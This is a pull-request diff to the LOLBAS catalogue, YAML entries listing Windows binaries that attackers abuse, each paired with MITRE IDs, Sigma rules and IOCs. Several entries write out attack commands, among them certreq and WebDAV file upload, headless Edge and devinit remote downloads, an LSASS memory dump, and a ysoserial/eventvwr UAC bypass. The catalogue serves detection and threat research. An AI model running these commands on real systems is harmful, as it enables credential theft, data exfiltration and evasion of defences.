Merge pull request #3 from LOLBAS-Project/master

Merge master branch from official project

NOTICE.md

@@ -14,7 +14,7 @@
 
 * Submitter: An individual, group, organization, or entity that contributes to the LOLBAS project through project maintenance, issue submission, Pull Request (PR) submission, etc.
 * Consumer: An individual, group, organization, or entity that uses ("consumes") the LOLBAS project resources through the web portal or repository interfaces and capabilities.
-* OLBAS: Living Off The Land Binaries and Scripts
+* LOLBAS: Living Off The Land Binaries and Scripts
 * LOLBIN: Living Off The Land Binary
 * LOL/"lol": Living Off The Land
 

README.md

@@ -1,3 +1,12 @@
+<p align="center">
+    <a href="https://github.com/LOLBAS-Project/LOLBAS/actions/workflows/yaml-linting.yml/badge.svg?branch=master">
+        <img src="https://img.shields.io/github/actions/workflow/status/LOLBAS-Project/LOLBAS/yaml-linting.yml?branch=master" /></a>
+    <a href="https://github.com/LOLBAS-Project/LOLBAS">
+        <img src="https://lolbas-project.github.io/assets/lolbas-count.svg" /></a>
+    <a href="https://github.com/LOLBAS-Project/LOLBAS/stargazers">
+        <img src="https://img.shields.io/github/stars/LOLBAS-Project/LOLBAS?style=social" /></a>
+</p>
+
 # Living Off The Land Binaries and Scripts (and now also Libraries)
 
 <img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBAS.png" height="250">
@@ -72,6 +81,7 @@ The following folks help maintain the LOLBAS Project on their personal time:
 * Chris 'Lopi' Spehn ([@ConsciousHacker](https://twitter.com/ConsciousHacker))
 * Liam ([@liamsomerville](https://twitter.com/liamsomerville))
 * Wietze ([@Wietze](https://twitter.com/@Wietze))
+* Jose Hernandez ([@_josehelps](https://twitter.com/_josehelps))
 
 ## Thanks
 

yml/OSBinaries/Certreq.yml

@@ -10,14 +10,14 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 10, Windows 11
   - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
     Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
     Usecase: Upload
     Category: Upload
     Privileges: User
     MitreID: T1105
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\certreq.exe
   - Path: C:\Windows\SysWOW64\certreq.exe

yml/OSBinaries/Cmd.yml

@@ -1,7 +1,7 @@
 ---
 Name: Cmd.exe
 Description: The command-line interpreter in Windows
-Author: 'Ye Yint Min Thu Htut'
+Author: Ye Yint Min Thu Htut
 Created: 2019-06-26
 Commands:
   - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
@@ -9,7 +9,7 @@ Commands:
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1059.003
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: cmd.exe - < fakefile.doc:payload.bat
     Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
@@ -18,6 +18,20 @@ Commands:
     Privileges: User
     MitreID: T1059.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
+    Description: Downloads a specified file from a WebDAV server to the target file.
+    Usecase: Download/copy a file from a WebDAV server
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
+    Description: Uploads a specified file to a WebDAV server.
+    Usecase: Upload a file to a WebDAV server
+    Category: Upload
+    Privileges: User
+    MitreID: T1048.003
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\cmd.exe
   - Path: C:\Windows\SysWOW64\cmd.exe
@@ -29,6 +43,11 @@ Detection:
   - IOC: cmd.exe creating/modifying file contents in an alternate data stream.
 Resources:
   - Link: https://twitter.com/yeyint_mth/status/1143824979139579904
+  - Link: https://twitter.com/Mr_0rng/status/1601408154780446721
+  - Link: https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
+  - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type
 Acknowledgement:
   - Person: r0lan
     Handle: '@yeyint_mth'
+  - Person: Mr.0range
+    Handle: '@mr_0rng'

yml/OSBinaries/Conhost.yml

@@ -11,6 +11,13 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
+  - Command: "conhost.exe --headless calc.exe"
+    Description: Execute calc.exe with conhost.exe as parent process
+    Usecase: Specify --headless parameter to hide child process window (if applicable)
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
 Full_Path:
   - Path: c:\windows\system32\conhost.exe
 Detection:
@@ -19,6 +26,8 @@ Detection:
 Resources:
   - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
   - Link: https://twitter.com/Wietze/status/1511397781159751680
+  - Link: https://twitter.com/embee_research/status/1559410767564181504
+  - Link: https://twitter.com/ankit_anubhav/status/1561683123816972288
 Acknowledgement:
   - Person: Adam
     Handle: '@hexacorn'

yml/OSBinaries/Eventvwr.yml

@@ -14,9 +14,9 @@ Commands:
   - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
     Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
     Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
-    Category: Execute
+    Category: UAC Bypass
     Privileges: Administrator
-    MitreID: T1202
+    MitreID: T1548.002
     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\eventvwr.exe
@@ -26,7 +26,7 @@ Code_Sample:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_uac_bypass_eventvwr.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml
   - Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
   - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml
   - IOC: eventvwr.exe launching child process other than mmc.exe

yml/OSBinaries/Explorer.yml

@@ -1,7 +1,7 @@
 ---
 Name: Explorer.exe
 Description: Binary used for managing files and system components within Windows
-Author: 'Jai Minton'
+Author: Jai Minton
 Created: 2020-06-24
 Commands:
   - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
@@ -21,8 +21,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\explorer.exe
   - Path: C:\Windows\SysWOW64\explorer.exe
-Code_Sample:
-  - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml

yml/OSBinaries/Msedge.yml

@@ -0,0 +1,29 @@
+---
+Name: Msedge.exe
+Description: Microsoft Edge browser
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: msedge.exe https://example.com/file.exe.txt
+    Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+  - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
+    Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
+  - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1478116126005641220
+  - Link: https://twitter.com/mrd0x/status/1478234484881436672
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'

yml/OSBinaries/Odbcconf.yml

@@ -4,15 +4,24 @@ Description: Used in Windows for managing ODBC connections
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
-  - Command: odbcconf -f file.rsp
+  - Command: odbcconf /a {REGSVR c:\test\test.dll}
-    Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file.
+    Description: Execute DllREgisterServer from DLL specified.
     Usecase: Execute dll file using technique that can evade defensive counter measures
     Category: Execute
     Privileges: User
     MitreID: T1218.008
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: odbcconf /a {REGSVR c:\test\test.dll}
+  - Command: |
-    Description: Execute DllREgisterServer from DLL specified.
+      odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
+      odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
+    Description: Install a driver and load the DLL. Requires administrator privileges.
+    Usecase: Execute dll file using technique that can evade defensive counter measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.008
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: odbcconf -f file.rsp
+    Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
     Usecase: Execute dll file using technique that can evade defensive counter measures
     Category: Execute
     Privileges: User
@@ -22,7 +31,7 @@ Full_Path:
   - Path: C:\Windows\System32\odbcconf.exe
   - Path: C:\Windows\SysWOW64\odbcconf.exe
 Code_Sample:
-  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/58b5eb751379501aa237275f14381f0902e979a5/Archive-Old-Version/OSBinaries/Payload/file.rsp
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_odbcconf.yml
   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
@@ -30,7 +39,7 @@ Detection:
 Resources:
   - Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
   - Link: https://github.com/woanware/application-restriction-bypasses
-  - Link: https://twitter.com/Hexacorn/status/1187143326673330176
+  - Link: https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'

yml/OSBinaries/Rdrleakdiag.yml

@@ -31,7 +31,8 @@ Full_Path:
 Code_Sample:
   - Code:
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml
   - Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html
   - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
 Resources:

yml/OSBinaries/Runexehelper.yml

@@ -0,0 +1,24 @@
+---
+Name: Runexehelper.exe
+Description: Launcher process
+Author: Grzegorz Tworek
+Created: 2022-12-13
+Commands:
+  - Command: runexehelper.exe c:\windows\system32\calc.exe
+    Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.'
+    Usecase: Executes arbitrary code
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
+Full_Path:
+  - Path: c:\windows\system32\runexehelper.exe
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml
+  - IOC: c:\windows\system32\runexehelper.exe is run
+  - IOC: Existence of runexewithargs_output.txt file
+Resources:
+  - Link: https://twitter.com/0gtweet/status/1206692239839289344
+Acknowledgement:
+  - Person: Grzegorz Tworek
+    Handle: '@0gtweet'

yml/OSBinaries/Setres.yml

@@ -14,6 +14,7 @@ Commands:
 Full_Path:
   - Path: c:\windows\system32\setres.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml
   - IOC: Unusual location for choice.exe file
   - IOC: Process created from choice.com binary
   - IOC: Existence of choice.cmd file

yml/OSBinaries/Ssh.yml

@@ -1,4 +1,3 @@
----
 Name: ssh.exe
 Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
 Author: 'Akshat Pradhan'
@@ -11,17 +10,21 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10 1809, Windows Server 2019
-  - Command: ssh localhost calc.exe
+  - Command: ssh -o ProxyCommand=calc.exe .
-    Description: Executes calc.exe.
+    Description: Executes calc.exe from ssh.exe
-    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
+    Usecase: Performs execution of specified file, can be used as a defensive evasion.
-    Category: AWL Bypass
+    Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
-    OperatingSystem: Windows 10 1809, Windows Server 2019
+    OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\OpenSSH\ssh.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml
   - IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
   - IOC: command line arguments specifying execution.
+Resources:
+  - Link: https://gtfobins.github.io/gtfobins/ssh/
 Acknowledgement:
   - Person: Akshat Pradhan
+  - Person: Felix Boulet

yml/OSBinaries/Unregmp2.yml

@@ -15,6 +15,7 @@ Full_Path:
   - Path: C:\Windows\System32\unregmp2.exe
   - Path: C:\Windows\SysWOW64\unregmp2.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml
   - IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`
 Resources:
   - Link: https://twitter.com/notwhickey/status/1466588365336293385

yml/OSLibraries/Desk.yml

@@ -22,9 +22,9 @@ Full_Path:
   - Path: C:\Windows\System32\desk.cpl
   - Path: C:\Windows\SysWOW64\desk.cpl
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_new_src_file.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/1d7ee1cd197d3b35508e2a5bf34d9d3b6ca4f504/rules/windows/file/file_event/file_event_win_new_src_file.yml
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/1f8e37351e7c5d89ce7808391edaef34bd8db6c0/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
 Resources:
   - Link: https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt
   - Link: https://twitter.com/pabraeken/status/998627081360695297

yml/OSScripts/pester.yml

@@ -32,8 +32,6 @@ Code_Sample:
   - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml
 Resources:
   - Link: https://twitter.com/Oddvarmoe/status/993383596244258816
   - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378

yml/OtherMSBinaries/AccCheckConsole.yml

@@ -26,6 +26,7 @@ Full_Path:
 Code_Sample:
   - Code: https://docs.microsoft.com/en-us/windows/win32/winauto/custom-verification-routines
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml
   - IOC: Sysmon Event ID 1 - Process Creation
   - Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340
 Resources:

yml/OtherMSBinaries/Adplus.yml

@@ -41,7 +41,7 @@ Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
   - IOC: As a Windows SDK binary, execution on a system may be suspicious
 Resources:
-  - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
+  - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
   - Link: https://twitter.com/nas_bench/status/1534916659676422152
   - Link: https://twitter.com/nas_bench/status/1534915321856917506
 Acknowledgement:

yml/OtherMSBinaries/Agentexecutor.yml

@@ -23,6 +23,8 @@ Full_Path:
 Code_Sample:
   - Code:
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml
 Resources:
   - Link:
 Acknowledgement:

yml/OtherMSBinaries/Cdb.yml

@@ -1,7 +1,7 @@
 ---
 Name: Cdb.exe
 Description: Debugging tool included with Windows Debugging Tools.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: cdb.exe -cf x64_calc.wds -o notepad.exe
@@ -12,8 +12,8 @@ Commands:
     MitreID: T1127
     OperatingSystem: Windows
   - Command: |
-     cdb.exe -pd -pn <process_name>
+      cdb.exe -pd -pn <process_name>
-     .shell <cmd>
+      .shell <cmd>
     Description: Attaching to any process and executing shell commands.
     Usecase: Run a shell command under a trusted Microsoft signed binary
     Category: Execute
@@ -41,7 +41,7 @@ Resources:
   - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
   - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
   - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
-  - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
+  - Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/
   - Link: https://twitter.com/nas_bench/status/1534957360032120833
 Acknowledgement:
   - Person: Matt Graeber

yml/OtherMSBinaries/Createdump.yml

@@ -1,8 +1,8 @@
 ---
 Name: Createdump.exe
 Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
-Author: Daniel Santos
+Author: mr.d0x, Daniel Santos
-Created: 2022-08-05
+Created: 2022-01-20
 Commands:
   - Command: createdump.exe -n -f dump.dmp [PID]
     Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
@@ -13,7 +13,12 @@ Commands:
     OperatingSystem: Windows 10, Windows 11
 Full_Path:
   - Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
+  - Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
   - IOC: createdump.exe process with a command line containing the lsass.exe process id
 Resources:
   - Link: https://twitter.com/bopin2020/status/1366400799199272960

yml/OtherMSBinaries/Devinit.yml

@@ -0,0 +1,21 @@
+---
+Name: Devinit.exe
+Description: Visual Studio 2019 tool
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: devinit.exe run -t msi-install -i https://example.com/out.msi
+    Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
+    Usecase: Executes code from a (remote) MSI file.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.007
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1460815932402679809
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'

yml/OtherMSBinaries/Dotnet.yml

@@ -18,13 +18,20 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows 7 and up with .NET installed
+  - Command: dotnet.exe fsi
+    Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
+    Usecase: Execute arbitrary F# code
+    Category: Execute
+    Privileges: User
+    MitreID: T1059
+    OperatingSystem: Windows 10 and up with .NET SDK installed
   - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
     Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
     Usecase: Execute code bypassing AWL
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    OperatingSystem: Windows 10 with .NET Core installed
+    OperatingSystem: Windows 10 and up with .NET Core installed
 Full_Path:
   - Path: 'C:\Program Files\dotnet\dotnet.exe'
 Detection:
@@ -35,8 +42,11 @@ Resources:
   - Link: https://twitter.com/_felamos/status/1204705548668555264
   - Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
   - Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
+  - Link: https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
 Acknowledgement:
   - Person: felamos
     Handle: '@_felamos'
   - Person: Jimmy
     Handle: '@bohops'
+  - Person: yamalon
+    Handle: '@mavinject'

yml/OtherMSBinaries/DumpMinitool.yml

@@ -0,0 +1,20 @@
+---
+Name: DumpMinitool.exe
+Description: Dump tool part Visual Studio 2022
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
+    Description: Creates a memory dump of the lsass process
+    Usecase: Create memory dump and parse it offline
+    Category: Dump
+    Privileges: Administrator
+    MitreID: T1003.001
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1511415432888131586
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'

yml/OtherMSBinaries/Fsi.yml

@@ -1,4 +1,3 @@
----
 Name: Fsi.exe
 Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
 Author: Jimmy (@bohops)
@@ -28,6 +27,7 @@ Detection:
   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
   - IOC: Fsi.exe execution may be suspicious on non-developer machines
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
 Resources:
   - Link: https://twitter.com/NickTyrer/status/904273264385589248
   - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

yml/OtherMSBinaries/FsiAnyCpu.yml

@@ -25,6 +25,7 @@ Code_Sample:
 Detection:
   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
   - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
 Resources:
   - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
 Acknowledgement:

yml/OtherMSBinaries/Mftrace.yml

@@ -26,6 +26,7 @@ Full_Path:
 Code_Sample:
   - Code:
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml
 Resources:
   - Link: https://twitter.com/0rbz_/status/988911181422186496
 Acknowledgement:

yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml

@@ -0,0 +1,21 @@
+---
+Name: Microsoft.NodejsTools.PressAnyKey.exe
+Description: Part of the NodeJS Visual Studio tools.
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
+    Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
+    Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1463526834918854661
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'

yml/OtherMSBinaries/MsoHtmEd.yml

@@ -28,6 +28,7 @@ Full_Path:
   - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
   - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
   - IOC: Suspicious Office application internet/network traffic
 Acknowledgement:
   - Person: Nir Chako (Pentera)

yml/OtherMSBinaries/Mspub.yml

@@ -25,6 +25,7 @@ Full_Path:
   - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
   - Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml
   - IOC: Suspicious Office application internet/network traffic
 Acknowledgement:
   - Person: 'Nir Chako (Pentera)'

